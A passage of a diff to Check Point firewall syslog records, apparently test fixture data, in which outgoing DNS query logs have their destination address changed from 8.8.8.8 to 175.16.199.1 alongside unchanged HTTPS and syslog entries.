s_port:"56863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55207"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52081"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53647"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55207"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53647"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49486"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53342"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55430"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55430"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38497"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54612"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e784,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34586"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53142"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48952"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53142"; service:"53"; 
